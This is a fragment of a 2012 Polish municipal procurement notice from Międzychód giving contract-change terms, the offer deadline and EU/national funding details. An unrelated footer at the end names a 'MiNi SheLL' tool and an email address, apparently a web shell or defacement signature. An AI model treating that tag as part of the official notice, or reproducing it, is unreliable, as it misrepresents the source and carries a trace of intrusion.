<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych w Rozdz. XVI SIWZ, z uwzględnieniem podawanych warunków ich wprowadzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzychod.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w wersji papierowej można uzyskać pod adresem Zamawiającego podany w pkt.I..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 12:00, miejsce: w siedzibie zamawiającego Urząd Miasta i Gminy w Międzychodzie ul.Piłsudskiego 2, 64-400 Międzychód - pokój nr 45 Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja dotowana z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w ramach Programu priorytetowego nr 5.3.1 System zielonych inwestycji..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com